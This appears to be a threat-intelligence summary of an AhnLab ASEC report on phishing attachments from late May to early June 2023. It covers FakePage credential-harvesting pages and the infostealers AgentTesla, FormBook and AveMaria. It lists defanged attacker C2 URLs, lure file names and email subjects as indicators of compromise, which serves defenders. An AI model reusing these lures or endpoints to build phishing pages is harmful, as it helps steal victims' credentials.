ASEC analyzes phishing email threats focusing on attachments from May 28th to June 3rd, 2023, highlighting FakePage campaigns, Infostealers, and related malware distribution patterns. The report emphasizes the prevalence of the “Invoice” keyword, the use of various attachment types and C2 URLs, and notes Korean-targeted cases alongside global ones.
#FakePage #AveMaria #AgentTesla #UPS_Korea #DHL
#FakePage #AveMaria #AgentTesla #UPS_Korea #DHL
Keypoints
- Phishing email attachments were the focus, with FakePageCache (FakePage) as the most prevalent threat type (36%).
- Infostealers (AgentTesla, FormBook, AveMaria) were the second most common (27%), followed by Trojan (22%), Downloader (10%), and smaller shares of Exploit, Worm, Backdoor, and Dropper.
- FakePages imitate real login pages to harvest credentials, sending input to the attacker’s C2 server or directing to additional fake sites.
- Malware distributions used attachments with various file extensions; FakePages used HTML/HTM-based pages, while Infostealer/Downloader used compressed files (RAR, ZIP, 7Z, etc.).
- Many cases included Korean-targeted subject lines; some used Korean-language emails and attachments.
- The analysis lists a set of fake login page C2 URLs that victims are directed to, illustrating how credential collection occurs.
- Keywords to beware of include “Invoice”; a Turkish example mentions SCR extensions and AveMaria injection via aspnet_compiler.exe.
MITRE Techniques
- [T1598] Phishing for Information – Reconnaissance – The report notes that phishing leaks credentials through social engineering disguises; “phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods.”
- [T1566] Phishing – Initial Access – Phishing emails are designed to deceive users into accessing fake login pages or executing malware; “phishing emails … to induce users to access fake login pages or execute malware.”
- [T1534] Internal Spearphishing – Lateral Movement – The content discusses fake login pages evolving to closely resemble originals, enabling credential theft and movement within systems; “Fake login pages are evolving by the second to closely resemble the original pages.”
Indicators of Compromise
- [URL] Fake login page C2 URLs – https[:]//submit-form[.]com/nv7B93q6, https[:]//www[.]spgiutar[.]com/mmc/fdpxoGur23f[.]php
- [URL] Additional FakePage C2 URLs – http[:]//www[.]miassmebel-neo[.]ru/ZaZa/port25[.]php, https[:]//aphal[.]000webhostapp[.]com/acr/PDF
- [File name] Email attachments used in campaigns – FedEx.html, PO-02-QT-000488 _**********.com.HTM
- [Email Subject] Example FakePage subjects – [FedEx] Tariffs payment notice (Tax Invoice), Booking.com Invoice 8831882301
- [File extension] Uncommon attachment extension observed – SCR
- [Process] Image/ASP-related injection content mentions – aspnet_compiler.exe
- [Malware] AveMaria and Infostealer families associated – AveMaria, AgentTesla, FormBook
Read more: https://asec.ahnlab.com/en/54163/